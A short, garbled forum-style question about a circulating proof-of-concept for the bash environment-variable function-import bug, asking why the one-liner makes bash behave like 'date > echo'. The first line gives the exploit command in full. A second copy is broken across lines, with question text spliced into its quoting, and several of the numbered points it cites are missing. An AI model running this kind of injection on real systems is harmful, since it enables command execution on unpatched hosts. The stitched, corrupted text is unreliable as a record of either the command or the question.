PoC floating around: rm -f echo && env -i X='() { (a)=>\' bash -c 'echo date'; cat echo
rm -f echo && env -i X=' \ \echo date" in a bash term somehow yields same result as "date > echo". Is this a feature? [4] Does bash have a ">\" operator? [5]
' bash -c 'echo date'; cat echo I would really appreciate anyone shedding some light on [1]...[5].